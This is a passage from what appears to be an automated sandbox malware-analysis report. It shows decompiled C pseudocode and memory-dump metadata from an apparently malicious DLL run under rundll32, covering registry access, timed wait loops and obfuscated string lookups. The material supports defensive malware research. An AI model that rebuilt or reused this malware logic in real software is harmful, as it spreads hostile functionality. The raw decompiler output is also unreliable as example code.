                                                                                                                                                                                                                                    						_t70 = E031B6BFA(_a4, 0x80000001, _v12, _t77,  &_v88,  &_v84);
                                                                                                                                                                                                                                    						_t51 = E031B9039(_t68, _t77);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					if(_t70 != 0) {
                                                                                                                                                                                                                                    						L17:
                                                                                                                                                                                                                                    						_t43 = E031B9039(_t51, _v12);
                                                                                                                                                                                                                                    						L19:
                                                                                                                                                                                                                                    						_t76 = _a4;
                                                                                                                                                                                                                                    						if(_a4 != 0) {
                                                                                                                                                                                                                                    							_t43 = E031B1F99(_t76);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						goto L22;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						if(( *0x31bd260 & 0x00000001) == 0) {
                                                                                                                                                                                                                                    							L14:
                                                                                                                                                                                                                                    							E031B8F83(_t70, _v88, _v84,  *0x31bd270, 0);
                                                                                                                                                                                                                                    							_t70 = E031B1C74(_v88,  &_v80,  &_v76, 0);
                                                                                                                                                                                                                                    							if(_t70 == 0) {
                                                                                                                                                                                                                                    								_v24 = _a4;
                                                                                                                                                                                                                                    								_v20 =  &_v88;
                                                                                                                                                                                                                                    								_t70 = E031B42EA( &_v40, 0);
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							_t51 = E031B9039(_t56, _v88);
                                                                                                                                                                                                                                    							goto L17;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t60 =  *0x31bd27c; // 0x1faa5a8
                                                                                                                                                                                                                                    						_t18 = _t60 + 0x31be823; // 0x65696c43
                                                                                                                                                                                                                                    						_t51 = E031B809F(0, _t18);
                                                                                                                                                                                                                                    						_t79 = _t51;
                                                                                                                                                                                                                                    						if(_t51 == 0) {
                                                                                                                                                                                                                                    							_t70 = 8;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_t70 = E031B6BFA(_a4, 0x80000001, _v12, _t79,  &_v72,  &_v68);
                                                                                                                                                                                                                                    							_t51 = E031B9039(_t65, _t79);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						if(_t70 != 0) {
                                                                                                                                                                                                                                    							goto L17;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							goto L14;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    			}

























                                                                                                                                                                                                                                    0x031b3f62
                                                                                                                                                                                                                                    0x031b3e47
                                                                                                                                                                                                                                    0x031b3e49
                                                                                                                                                                                                                                    0x031b3e49
                                                                                                                                                                                                                                    0x031b3e54
                                                                                                                                                                                                                                    0x031b3e5b
                                                                                                                                                                                                                                    0x031b3e5e
                                                                                                                                                                                                                                    0x031b3f4d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x031b3e64
                                                                                                                                                                                                                                    0x031b3e64
                                                                                                                                                                                                                                    0x031b3e69
                                                                                                                                                                                                                                    0x031b3e72
                                                                                                                                                                                                                                    0x031b3e77
                                                                                                                                                                                                                                    0x031b3e80
                                                                                                                                                                                                                                    0x031b3ea3
                                                                                                                                                                                                                                    0x031b3e82
                                                                                                                                                                                                                                    0x031b3e98
                                                                                                                                                                                                                                    0x031b3e9a
                                                                                                                                                                                                                                    0x031b3e9a
                                                                                                                                                                                                                                    0x031b3ea6
                                                                                                                                                                                                                                    0x031b3f41
                                                                                                                                                                                                                                    0x031b3f44
                                                                                                                                                                                                                                    0x031b3f4e
                                                                                                                                                                                                                                    0x031b3f4e
                                                                                                                                                                                                                                    0x031b3f53
                                                                                                                                                                                                                                    0x031b3f55
                                                                                                                                                                                                                                    0x031b3f55
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x031b3eac
                                                                                                                                                                                                                                    0x031b3eb3
                                                                                                                                                                                                                                    0x031b3ef4
                                                                                                                                                                                                                                    0x031b3f05
                                                                                                                                                                                                                                    0x031b3f1b
                                                                                                                                                                                                                                    0x031b3f1f
                                                                                                                                                                                                                                    0x031b3f24
                                                                                                                                                                                                                                    0x031b3f2a
                                                                                                                                                                                                                                    0x031b3f37
                                                                                                                                                                                                                                    0x031b3f37
                                                                                                                                                                                                                                    0x031b3f3c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x031b3f3c
                                                                                                                                                                                                                                    0x031b3eb5
                                                                                                                                                                                                                                    0x031b3eba
                                                                                                                                                                                                                                    0x031b3ec3
                                                                                                                                                                                                                                    0x031b3ec8
                                                                                                                                                                                                                                    0x031b3ecc
                                                                                                                                                                                                                                    0x031b3eef
                                                                                                                                                                                                                                    0x031b3ece
                                                                                                                                                                                                                                    0x031b3ee4
                                                                                                                                                                                                                                    0x031b3ee6
                                                                                                                                                                                                                                    0x031b3ee6
                                                                                                                                                                                                                                    0x031b3ef2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x031b3ef2
                                                                                                                                                                                                                                    0x031b3ea6

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.526880922.00000000031B1000.00000020.00020000.sdmp, Offset: 031B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.526816146.00000000031B0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527055981.00000000031BC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527086530.00000000031BD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527107409.00000000031BF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_31b0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • Opcode ID: cbc47699cc397add9b8b76a1d51acfdf66563a0991e2f1bf03e40e1169e6d0f3
                                                                                                                                                                                                                                    • Instruction ID: 274dd6c54133265cdfcfb8c3230f81177c1e1f1fe1489b7edb685bee04419e3d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cbc47699cc397add9b8b76a1d51acfdf66563a0991e2f1bf03e40e1169e6d0f3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B5417C7AA00318ABDB11EFE4DC84DEEBBBDEF0C640B054566E911EB110E771DE558BA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.526880922.00000000031B1000.00000020.00020000.sdmp, Offset: 031B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.526816146.00000000031B0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527055981.00000000031BC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527086530.00000000031BD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527107409.00000000031BF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_31b0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • Opcode ID: ff485f5616df63ffbef05080654aad184936fd6d98ad6234068300044721c449
                                                                                                                                                                                                                                    • Instruction ID: 9914aab0b2503623bed2db8aaf8608f7ce91557dd5aa0ab747a8533d59aa7994
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ff485f5616df63ffbef05080654aad184936fd6d98ad6234068300044721c449
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4051DA7A91020ABFCB10DFE4C8948EEB7B6BF8C340B198979E505AB214D771AD45CB51
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 21%
                                                                                                                                                                                                                                    			E031B6786(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                                    				char _v16;
                                                                                                                                                                                                                                    				char _v20;
                                                                                                                                                                                                                                    				signed int _v24;
                                                                                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                                                                                    				char _v36;
                                                                                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                                                                                    				char _v44;
                                                                                                                                                                                                                                    				char _v88;
                                                                                                                                                                                                                                    				char _v92;
                                                                                                                                                                                                                                    				char* _t44;
                                                                                                                                                                                                                                    				intOrPtr _t48;
                                                                                                                                                                                                                                    				intOrPtr _t50;
                                                                                                                                                                                                                                    				intOrPtr _t51;
                                                                                                                                                                                                                                    				char _t55;
                                                                                                                                                                                                                                    				intOrPtr _t59;
                                                                                                                                                                                                                                    				signed int _t60;
                                                                                                                                                                                                                                    				void* _t63;
                                                                                                                                                                                                                                    				intOrPtr* _t64;
                                                                                                                                                                                                                                    				void* _t65;
                                                                                                                                                                                                                                    				signed int _t66;
                                                                                                                                                                                                                                    				intOrPtr _t71;
                                                                                                                                                                                                                                    				intOrPtr* _t72;
                                                                                                                                                                                                                                    				intOrPtr* _t73;
                                                                                                                                                                                                                                    				void* _t75;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t44 =  &_v88;
                                                                                                                                                                                                                                    				_v92 = 0;
                                                                                                                                                                                                                                    				L031BA7BC();
                                                                                                                                                                                                                                    				__imp__(0, 1, 0, _t44, 0, 0x2c);
                                                                                                                                                                                                                                    				_v44 = _t44;
                                                                                                                                                                                                                                    				if(_t44 == 0) {
                                                                                                                                                                                                                                    					__imp__();
                                                                                                                                                                                                                                    					_v8 = _t44;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_v20 = 0;
                                                                                                                                                                                                                                    					_v16 = 0;
                                                                                                                                                                                                                                    					L031BB0C8();
                                                                                                                                                                                                                                    					_t72 = __imp__; // 0x76d7f710
                                                                                                                                                                                                                                    					_v36 = _t44;
                                                                                                                                                                                                                                    					_v32 = __edx;
                                                                                                                                                                                                                                    					 *_t72(_v44,  &_v36, 0, 0, 0, 0,  *0x31bd240, 0, 0xff676980, 0xffffffff);
                                                                                                                                                                                                                                    					_t48 =  *0x31bd26c; // 0x2d0
                                                                                                                                                                                                                                    					_t64 = __imp__; // 0x76d7f730
                                                                                                                                                                                                                                    					_v40 = _t48;
                                                                                                                                                                                                                                    					_t50 =  *_t64(2,  &_v44, 0, 0xffffffff);
                                                                                                                                                                                                                                    					_v8 = _t50;
                                                                                                                                                                                                                                    					if(_t50 == 0) {
                                                                                                                                                                                                                                    						if(_a8 != 0) {
                                                                                                                                                                                                                                    							L4:
                                                                                                                                                                                                                                    							 *0x31bd24c = 5;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_t63 = E031B73FD(__edx); // executed
                                                                                                                                                                                                                                    							if(_t63 != 0) {
                                                                                                                                                                                                                                    								goto L4;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_v12 = 0;
                                                                                                                                                                                                                                    						L6:
                                                                                                                                                                                                                                    						L6:
                                                                                                                                                                                                                                    						if(_v12 == 1 && ( *0x31bd260 & 0x00000001) == 0) {
                                                                                                                                                                                                                                    							_v12 = 2;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t66 = _v12;
                                                                                                                                                                                                                                    						_t53 = _t66 << 4;
                                                                                                                                                                                                                                    						_t71 = _t75 + (_t66 << 4) - 0x54;
                                                                                                                                                                                                                                    						_t67 = _t66 + 1;
                                                                                                                                                                                                                                    						_v24 = _t66 + 1;
                                                                                                                                                                                                                                    						_t55 = E031B8504(_t75 + _t53 - 0x58, _t66 + 1, _t67, _t75 + _t53 - 0x58, _t71,  &_v20,  &_v16); // executed
                                                                                                                                                                                                                                    						_v8 = _t55;
                                                                                                                                                                                                                                    						if(_t55 != 0) {
                                                                                                                                                                                                                                    							goto L17;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t60 = _v24;
                                                                                                                                                                                                                                    						_t85 = _t60 - 3;
                                                                                                                                                                                                                                    						_v12 = _t60;
                                                                                                                                                                                                                                    						if(_t60 != 3) {
                                                                                                                                                                                                                                    							goto L6;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_v8 = E031B3BF1(_t67, _t85,  &_v92, _a4, _a8);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						goto L12;
                                                                                                                                                                                                                                    						L17:
                                                                                                                                                                                                                                    						__eflags = _t55 - 0x10d2;
                                                                                                                                                                                                                                    						if(_t55 != 0x10d2) {
                                                                                                                                                                                                                                    							_push(0xffffffff);
                                                                                                                                                                                                                                    							_push(0xff676980);
                                                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                                                    							_push( *0x31bd244);
                                                                                                                                                                                                                                    							goto L21;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							__eflags =  *0x31bd248; // 0x0
                                                                                                                                                                                                                                    							if(__eflags == 0) {
                                                                                                                                                                                                                                    								goto L12;
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								_t55 = E031BA1B0();
                                                                                                                                                                                                                                    								_push(0xffffffff);
                                                                                                                                                                                                                                    								_push(0xdc3cba00);
                                                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                                                    								_push( *0x31bd248);
                                                                                                                                                                                                                                    								L21:
                                                                                                                                                                                                                                    								L031BB0C8();
                                                                                                                                                                                                                                    								_v36 = _t55;
                                                                                                                                                                                                                                    								_v32 = _t71;
                                                                                                                                                                                                                                    								 *_t72(_v44,  &_v36, 0, 0, 0, 0); // executed
                                                                                                                                                                                                                                    								_t59 =  *_t64(2,  &_v44, 0, 0xffffffff);
                                                                                                                                                                                                                                    								__eflags = _t59;
                                                                                                                                                                                                                                    								_v8 = _t59;
                                                                                                                                                                                                                                    								if(_t59 == 0) {
                                                                                                                                                                                                                                    									goto L6;
                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                    									goto L12;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						L25:
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					L12:
                                                                                                                                                                                                                                    					_t73 =  &_v92;
                                                                                                                                                                                                                                    					_t65 = 3;
                                                                                                                                                                                                                                    					do {
                                                                                                                                                                                                                                    						_t51 =  *_t73;
                                                                                                                                                                                                                                    						if(_t51 != 0) {
                                                                                                                                                                                                                                    							__imp__( *0x31bd238, 0, _t51);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t73 = _t73 + 0x10;
                                                                                                                                                                                                                                    						_t65 = _t65 - 1;
                                                                                                                                                                                                                                    					} while (_t65 != 0);
                                                                                                                                                                                                                                    					__imp__(_v44);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _v8;
                                                                                                                                                                                                                                    				goto L25;
                                                                                                                                                                                                                                    			}






























                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.526880922.00000000031B1000.00000020.00020000.sdmp, Offset: 031B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.526816146.00000000031B0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527055981.00000000031BC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527086530.00000000031BD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527107409.00000000031BF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_31b0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 61ddc881da5c1044b253996b3e16b04c3ddf788f39f665264b90970e2ee64f94
                                                                                                                                                                                                                                    • Instruction ID: 09c999d10757b45502d5f2e3f88ddde0c4aba9c7c5174df49416a3b8f3002bb7
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 61ddc881da5c1044b253996b3e16b04c3ddf788f39f665264b90970e2ee64f94
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4E513A75805229ABDF18EF95EC849EEBFBCEF4D320F244156F910A6194E7709684CBA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 395 31b9152-31b9178 397 31b917e-31b919b call 31b3aef 395->397 398 31b9246-31b924c 395->398 401 31b923d-31b9242 397->401 402 31b91a1-31b91a6 397->402 401->398 403 31b91a8-31b91ab 402->403 404 31b91be-31b91c0 402->404 403->404 405 31b91ad-31b91bc 403->405 404->401 406 31b91c2-31b91e0 404->406 405->404 407 31b91e4-31b91e8 406->407 409 31b91ea-31b91f6 call 31b7c14 407->409 410 31b9216-31b921b 407->410 409->410 418 31b91f8-31b91fd 409->418 412 31b921d-31b921f 410->412 413 31b9223-31b922c 410->413 412->413 415 31b922e 413->415 416 31b9233-31b9236 413->416 415->416 416->401 417 31b9238 416->417 417->401 418->410 419 31b91ff-31b9202 418->419 419->410 420 31b9204-31b9214 419->420 420->410
                                                                                                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                                                                                                    			E031B9152(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                    				intOrPtr* _t35;
                                                                                                                                                                                                                                    				void* _t40;
                                                                                                                                                                                                                                    				intOrPtr* _t41;
                                                                                                                                                                                                                                    				intOrPtr* _t43;
                                                                                                                                                                                                                                    				intOrPtr* _t45;
                                                                                                                                                                                                                                    				intOrPtr* _t50;
                                                                                                                                                                                                                                    				intOrPtr* _t52;
                                                                                                                                                                                                                                    				void* _t54;
                                                                                                                                                                                                                                    				intOrPtr* _t55;
                                                                                                                                                                                                                                    				intOrPtr* _t57;
                                                                                                                                                                                                                                    				intOrPtr* _t61;
                                                                                                                                                                                                                                    				intOrPtr* _t65;
                                                                                                                                                                                                                                    				intOrPtr _t68;
                                                                                                                                                                                                                                    				void* _t72;
                                                                                                                                                                                                                                    				void* _t75;
                                                                                                                                                                                                                                    				void* _t76;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t55 = _a4;
                                                                                                                                                                                                                                    				_t35 =  *((intOrPtr*)(_t55 + 4));
                                                                                                                                                                                                                                    				_a4 = 0;
                                                                                                                                                                                                                                    				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                                                                                                                                                                                                                                    				if(_t76 < 0) {
                                                                                                                                                                                                                                    					L18:
                                                                                                                                                                                                                                    					return _t76;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t40 = E031B3AEF(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
                                                                                                                                                                                                                                    				_t76 = _t40;
                                                                                                                                                                                                                                    				if(_t76 >= 0) {
                                                                                                                                                                                                                                    					_t61 = _a28;
                                                                                                                                                                                                                                    					if(_t61 != 0 &&  *_t61 != 0) {
                                                                                                                                                                                                                                    						_t52 = _v8;
                                                                                                                                                                                                                                    						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					if(_t76 >= 0) {
                                                                                                                                                                                                                                    						_t43 =  *_t55;
                                                                                                                                                                                                                                    						_t68 =  *0x31bd27c; // 0x1faa5a8
                                                                                                                                                                                                                                    						_t20 = _t68 + 0x31be1fc; // 0x740053
                                                                                                                                                                                                                                    						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                                                                                                                                                                                                                                    						if(_t76 >= 0) {
                                                                                                                                                                                                                                    							_t76 = E031B7C14(_a4);
                                                                                                                                                                                                                                    							if(_t76 >= 0) {
                                                                                                                                                                                                                                    								_t65 = _a28;
                                                                                                                                                                                                                                    								if(_t65 != 0 &&  *_t65 == 0) {
                                                                                                                                                                                                                                    									_t50 = _a4;
                                                                                                                                                                                                                                    									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t45 = _a4;
                                                                                                                                                                                                                                    						if(_t45 != 0) {
                                                                                                                                                                                                                                    							 *((intOrPtr*)( *_t45 + 8))(_t45);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t57 = __imp__#6; // 0x7414d5b0
                                                                                                                                                                                                                                    						if(_a20 != 0) {
                                                                                                                                                                                                                                    							 *_t57(_a20);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						if(_a12 != 0) {
                                                                                                                                                                                                                                    							 *_t57(_a12);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t41 = _v8;
                                                                                                                                                                                                                                    				 *((intOrPtr*)( *_t41 + 8))(_t41);
                                                                                                                                                                                                                                    				goto L18;
                                                                                                                                                                                                                                    			}






















                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.526880922.00000000031B1000.00000020.00020000.sdmp, Offset: 031B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.526816146.00000000031B0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527055981.00000000031BC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527086530.00000000031BD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527107409.00000000031BF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_31b0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph (function at 31b269c)
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.526880922.00000000031B1000.00000020.00020000.sdmp, Offset: 031B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.526816146.00000000031B0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527055981.00000000031BC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527086530.00000000031BD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527107409.00000000031BF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_31b0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph (function at 31b3aef)
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.526880922.00000000031B1000.00000020.00020000.sdmp, Offset: 031B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.526816146.00000000031B0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527055981.00000000031BC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527086530.00000000031BD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527107409.00000000031BF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_31b0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph (function at 31b73fd)
                                                                                                                                                                                                                                    C-Code - Quality: 62%
                                                                                                                                                                                                                                    			E031B73FD(void* __edx) {
                                                                                                                                                                                                                                    				char _v8;
                                                                                                                                                                                                                                    				char _v12;
                                                                                                                                                                                                                                    				char _v16;
                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                    				void* _t23;
                                                                                                                                                                                                                                    				intOrPtr _t24;
                                                                                                                                                                                                                                    				void* _t26;
                                                                                                                                                                                                                                    				intOrPtr _t32;
                                                                                                                                                                                                                                    				intOrPtr _t35;
                                                                                                                                                                                                                                    				intOrPtr _t38;
                                                                                                                                                                                                                                    				void* _t40;
                                                                                                                                                                                                                                    				intOrPtr _t42;
                                                                                                                                                                                                                                    				void* _t45;
                                                                                                                                                                                                                                    				void* _t50;
                                                                                                                                                                                                                                    				intOrPtr* _t52;
                                                                                                                                                                                                                                    				void* _t55;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t50 = __edx;
                                                                                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                                                                                    				_t23 = E031BA72D(0,  &_v8); // executed
                                                                                                                                                                                                                                    				if(_t23 != 0) {
                                                                                                                                                                                                                                    					_v8 = 0;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t24 =  *0x31bd27c; // 0x1faa5a8
                                                                                                                                                                                                                                    				_t4 = _t24 + 0x31bede0; // 0x5169388
                                                                                                                                                                                                                                    				_t5 = _t24 + 0x31bed88; // 0x4f0053
                                                                                                                                                                                                                                    				_t26 = E031B1262( &_v16, _v8, _t5, _t4); // executed
                                                                                                                                                                                                                                    				_t45 = _t26;
                                                                                                                                                                                                                                    				if(_t45 == 0) {
                                                                                                                                                                                                                                    					 *0x31bd0f4(_v16, 0,  &_v12);
                                                                                                                                                                                                                                    					_t52 = __imp__; // 0x76d25520
                                                                                                                                                                                                                                    					_t45 = 8;
                                                                                                                                                                                                                                    					if(_v12 < _t45) {
                                                                                                                                                                                                                                    						_t45 = 1;
                                                                                                                                                                                                                                    						__eflags = 1;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t32 =  *0x31bd27c; // 0x1faa5a8
                                                                                                                                                                                                                                    						_t11 = _t32 + 0x31bedd4; // 0x516937c
                                                                                                                                                                                                                                    						_t48 = _t11;
                                                                                                                                                                                                                                    						_t12 = _t32 + 0x31bed88; // 0x4f0053
                                                                                                                                                                                                                                    						_t55 = E031B7CB8(_t11, _t12, _t11);
                                                                                                                                                                                                                                    						_t59 = _t55;
                                                                                                                                                                                                                                    						if(_t55 != 0) {
                                                                                                                                                                                                                                    							_t35 =  *0x31bd27c; // 0x1faa5a8
                                                                                                                                                                                                                                    							_t13 = _t35 + 0x31bee1e; // 0x30314549
                                                                                                                                                                                                                                    							if(E031B89D6(_t48, _t50, _t59, _v8, _t55, _t13, 0x14) == 0) {
                                                                                                                                                                                                                                    								_t61 =  *0x31bd25c - 6;
                                                                                                                                                                                                                                    								if( *0x31bd25c <= 6) {
                                                                                                                                                                                                                                    									_t42 =  *0x31bd27c; // 0x1faa5a8
                                                                                                                                                                                                                                    									_t15 = _t42 + 0x31bec2a; // 0x52384549
                                                                                                                                                                                                                                    									E031B89D6(_t48, _t50, _t61, _v8, _t55, _t15, 0x13);
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							_t38 =  *0x31bd27c; // 0x1faa5a8
                                                                                                                                                                                                                                    							_t17 = _t38 + 0x31bee18; // 0x51693c0
                                                                                                                                                                                                                                    							_t18 = _t38 + 0x31bedf0; // 0x680043
                                                                                                                                                                                                                                    							_t40 = E031B2659(_v8, 0x80000001, _t55, _t18, _t17);
                                                                                                                                                                                                                                    							_t45 = _t40;
                                                                                                                                                                                                                                    							 *_t52( *0x31bd238, 0, _t55);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					 *_t52( *0x31bd238, 0, _v16);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t54 = _v8;
                                                                                                                                                                                                                                    				if(_v8 != 0) {
                                                                                                                                                                                                                                    					E031B1F99(_t54);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t45;
                                                                                                                                                                                                                                    			}




















                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.526880922.00000000031B1000.00000020.00020000.sdmp, Offset: 031B0000, based on PE: true
• Associated: 00000003.00000002.526816146.00000000031B0000.00000004.00020000.sdmp
